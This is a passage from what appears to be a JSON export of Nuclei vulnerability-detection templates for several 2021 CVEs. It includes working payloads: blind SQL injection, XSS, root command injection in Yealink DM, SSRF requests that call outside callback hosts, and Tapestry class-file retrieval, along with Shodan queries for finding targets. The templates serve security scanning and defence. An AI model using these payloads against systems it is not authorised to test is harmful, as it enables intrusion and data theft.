cve-id: CVE-2021-27314\n cwe-id: CWE-89\n epss-score: 0.25703\n epss-percentile: 0.96281\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /admin/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Doctor Appoinment System\")'\n condition: and\n# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950", "hash": "4230e014f7f540b760eae80d8b4dce88", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308316" }, "name": "CVE-2021-27315.yaml", "content": "id: CVE-2021-27315\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27315\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27315\n cwe-id: CWE-89\n epss-score: 0.06768\n epss-percentile: 0.93718\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 490a0046304402203675b5d024d7265ccc67751fa18a9456a08d9a6cfba7a69c677161ab2b54dc1202206a32db3d0a1aef4093b4b7de58ba04d3ca09b26a9ae9b2d325c794a17008810e:922c64590222798bb761d5b6d8e72950", "hash": "a6b97253d70000361c662047e0e2995b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308317" }, "name": "CVE-2021-27316.yaml", "content": "id: CVE-2021-27316\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27316\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27316\n cwe-id: CWE-89\n epss-score: 0.06768\n epss-percentile: 0.93718\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950", "hash": "3c4ece22a7c74dc5cedfadd58cdbc4ae", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308318" }, "name": "CVE-2021-27319.yaml", "content": "id: CVE-2021-27319\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27319\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27319\n cwe-id: CWE-89\n epss-score: 0.08052\n epss-percentile: 0.9371\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 4a0a00473045022100fa576cee94b83d7c02ff3f920da22eb82e877217997d45a6843359a9ffc7662902205ede6cd0bf165f8d505aefe36928930b5e3b2e68db775a7a684c6f125a86d3e4:922c64590222798bb761d5b6d8e72950", "hash": "b429db53e9b922f62397610c4cf5b226", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308319" }, "name": "CVE-2021-27320.yaml", "content": "id: CVE-2021-27320\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27320\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-27320\n cwe-id: CWE-89\n epss-score: 0.09267\n epss-percentile: 0.94102\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /contactus.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n firstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 500'\n - 'contains(body, \"Medical Management System\")'\n condition: and\n# digest: 4a0a00473045022100dd206ca7187b6ed469ca7ac639cf6d228f7811e762a78cdf8d6c89bd2defdf690220564ac31e30c8bf0db3d6b80d2f2903b35cb7fe2800fc655540dd2602b9e16acb:922c64590222798bb761d5b6d8e72950", "hash": "abb2d5ba1e54d3cbb015c017ce924d35", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831a" }, "name": "CVE-2021-27330.yaml", "content": "id: CVE-2021-27330\n\ninfo:\n name: Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting\n author: pikpikcu,daffainfo\n severity: medium\n description: |\n Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks.\n reference:\n - https://www.exploit-db.com/exploits/49597\n - http://www.triconsole.com/\n - http://www.triconsole.com/php/calendar_datepicker.php\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27330\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27330\n cwe-id: CWE-79\n epss-score: 0.00437\n epss-percentile: 0.74213\n cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: triconsole\n product: datepicker_calendar\n google-query: intitle:TriConsole.com - PHP Calendar Date Picker\n tags: cve2021,cve,xss,edb,triconsole\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/calendar/calendar_form.php/\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'TriConsole.com - PHP Calendar Date Picker'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b72158929a2c012eca6ad612ac51258afbd4964fc02c47f4b57368e7cf0bedd30220196fa0ae9b42667f6ed26e6b60c4a741f049d9d05d86ccd0dcdddfcb0b8641c7:922c64590222798bb761d5b6d8e72950", "hash": "59eb81c73453da7c66d065dd225e4843", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831b" }, "name": "CVE-2021-27358.yaml", "content": "id: CVE-2021-27358\n\ninfo:\n name: Grafana Unauthenticated Snapshot Creation\n author: pdteam,bing0o\n severity: high\n description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.\n impact: |\n An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.\n remediation: |\n Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.\n reference:\n - https://phabricator.wikimedia.org/T274736\n - https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27358\n - https://github.com/grafana/grafana/blob/master/CHANGELOG.md\n - https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2021-27358\n cwe-id: CWE-306\n epss-score: 0.02415\n epss-percentile: 0.89689\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2021,cve,grafana,unauth\n\nhttp:\n - raw:\n - |\n POST /api/snapshots HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"deleteUrl\":'\n - '\"deleteKey\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950", "hash": "8122dd0fb5a2cf82c3e694006985c757", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831c" }, "name": "CVE-2021-27519.yaml", "content": "id: CVE-2021-27519\n\ninfo:\n name: FUDForum 3.1.0 - Cross-Site Scripting\n author: kh4sh3i\n severity: medium\n description: |\n FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the \"srch\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49942\n - https://github.com/fudforum/FUDforum/issues/2\n - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27519\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27519\n cwe-id: CWE-79\n epss-score: 0.00217\n epss-percentile: 0.59015\n cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fudforum\n product: fudforum\n shodan-query: 'http.html:\"Powered by: FUDforum\"'\n tags: cve2021,cve,xss,fudforum,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f69ec7d4711d599dd40f92495d22b5d93ac3a8db167fe425f7b024ff41d888c5022030ad77de1858a49de1ff57b58e699741fa419442f186dd2a419fa4f433ee8138:922c64590222798bb761d5b6d8e72950", "hash": "9ecc2eb42d677c80954e9a25de40db21", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831d" }, "name": "CVE-2021-27520.yaml", "content": "id: CVE-2021-27520\n\ninfo:\n name: FUDForum 3.1.0 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49943\n - https://github.com/fudforum/FUDforum/issues/2\n - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27520\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27520\n cwe-id: CWE-79\n epss-score: 0.00217\n epss-percentile: 0.59015\n cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: fudforum\n product: fudforum\n shodan-query: html:\"FUDforum\"\n tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D'\n - '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - onmouseover=alert(document.domain) x=\n - FUDforum\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204a90f383fd73372c3a83f6f9db99d16bf93b8ee0401f22ad6088697eed2957d3022100a2c3bfa5bb7c6bc1edeeea494b9ad3a53468a5b98c9599afc9e4687efb802040:922c64590222798bb761d5b6d8e72950", "hash": "8c8ff7b067b0c2bf0207a13cdfc8d03a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831e" }, "name": "CVE-2021-27561.yaml", "content": "id: CVE-2021-27561\n\ninfo:\n name: YeaLink DM 3.6.0.20 - Remote Command Injection\n author: shifacyclewala,hackergautam\n severity: critical\n description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Update to the latest firmware version provided by the vendor to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561\n - https://ssd-disclosure.com/?p=4688\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27561\n cwe-id: CWE-78\n epss-score: 0.97434\n epss-percentile: 0.99939\n cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: yealink\n product: device_management\n tags: cve2021,cve,rce,yealink,mirai,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'uid'\n - 'gid'\n - 'groups'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"(u|g)id=.*\"\n# digest: 4a0a00473045022100e84f3b6f3b4431895a29b93f5706225e723a3306c1a1fba02583aeacd7fd802f02200c4f466848e8a98fdcc690f9d5d193830228d10b8759a412ce478da775f757dc:922c64590222798bb761d5b6d8e72950", "hash": "e4ec82d0549d13c8da9c040caec86fba", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30831f" }, "name": "CVE-2021-27651.yaml", "content": "id: CVE-2021-27651\n\ninfo:\n name: Pega Infinity - Authentication Bypass\n author: idealphase,daffainfo\n severity: critical\n description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Pega Infinity application.\n remediation: |\n Apply the necessary security patches or updates provided by Pega Infinity to mitigate the authentication bypass vulnerability (CVE-2021-27651).\n reference:\n - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27651\n - https://collaborate.pega.com/discussion/pega-security-advisory-a21-hotfix-matrix\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/orangmuda/CVE-2021-27651\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27651\n cwe-id: CWE-287\n epss-score: 0.07705\n epss-percentile: 0.94021\n cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: pega\n product: infinity\n tags: cve2021,cve,pega,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/prweb/PRAuth/app/default/\"\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 8.5.2', '>= 8.2.1')\n\n - type: word\n part: body\n words:\n - 'Pega Infinity'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - '(?m)Pega ([0-9.]+)'\n internal: true\n\n - type: regex\n group: 1\n regex:\n - '(?m)Pega ([0-9.]+)'\n# digest: 4b0a00483046022100bb3eb39482e6bae705caa5decca90a113164e112f360860f41ae3844effb25f3022100cbc7eeb4828f6198e465d2bec97ac6562e793c7c9b76a52e1c830319059eb040:922c64590222798bb761d5b6d8e72950", "hash": "dc9e65e69ec79e54d25778c4ddd569df", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308320" }, "name": "CVE-2021-27670.yaml", "content": "id: CVE-2021-27670\n\ninfo:\n name: Appspace 6.2.4 - Server-Side Request Forgery\n author: ritikchaddha\n severity: critical\n description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: |\n Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/h3110mb/PoCSSrfApp\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27670\n - https://github.com/ArrestX/--POC\n - https://github.com/KayCHENvip/vulnerability-poc\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27670\n cwe-id: CWE-918\n epss-score: 0.58348\n epss-percentile: 0.97664\n cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: appspace\n product: appspace\n shodan-query: title:\"Appspace\"\n tags: cve,cve2021,appspace,ssrf\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210089fc67fdff5afadc5dae929f61d4b47fe38949d2e34156c446d6f3c7933a76d802204f0f7d330a006d1cc55b25bc4ec8d916a9b84081b3612e8a2745c96cae680ba7:922c64590222798bb761d5b6d8e72950", "hash": "372997b27cb462a28c6ec86c45643378", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308321" }, "name": "CVE-2021-27748.yaml", "content": "id: CVE-2021-27748\n\ninfo:\n name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery\n author: pdteam\n severity: high\n description: |\n IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.\n reference:\n - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/\n - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748\n classification:\n cve-id: CVE-2021-27748\n metadata:\n verified: true\n max-request: 3\n shodan-query: http.html:\"IBM WebSphere Portal\"\n tags: cve2021,cve,hcl,ibm,ssrf,websphere\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'\n - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'\n\n host-redirects: true\n max-redirects: 2\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n\n - type: word\n part: body_1\n words:\n - \"Interactsh Server\"\n negative: true\n# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950", "hash": "65bd5fb26fb5f7b2fe55eb136ad80815", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308322" }, "name": "CVE-2021-27850.yaml", "content": "id: CVE-2021-27850\n\ninfo:\n name: Apache Tapestry - Remote Code Execution\n author: pdteam\n severity: critical\n description: |\n Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Apache to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27850\n - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E\n - http://www.openwall.com/lists/oss-security/2021/04/15/1\n - https://security.netapp.com/advisory/ntap-20210528-0002/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27850\n cwe-id: CWE-502,CWE-200\n epss-score: 0.97388\n epss-percentile: 0.99903\n cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: tapestry\n tags: cve,cve2021,apache,tapestry\n\nhttp:\n - raw:\n - |\n GET /assets/app/something/services/AppModule.class/ HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n - |\n GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'application/java'\n\n - type: word\n part: body\n words:\n - 'configuration'\n - 'webtools'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: id\n group: 1\n regex:\n - '\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod'\n internal: true\n part: header\n# digest: 490a00463044022070f0c04ecf3a9fd26ce9b1691219435ab15f0cd55e185ba3586553743c17e82d02205e3a8a905f69891dc2c1c5b7651a0e91c63afc906d36ebdcd6425467650c5ab1:922c64590222798bb761d5b6d8e72950", "hash": "2f5ff1e7d33bcb040e9e23a9e7dd9094", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308323" }, "name": "CVE-2021-27905.yaml", "content": "id: CVE-2021-27905\n\ninfo:\n name: Apache Solr <=8.8.1 - Server-Side Request Forgery\n author: hackergautam\n severity: critical\n description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another 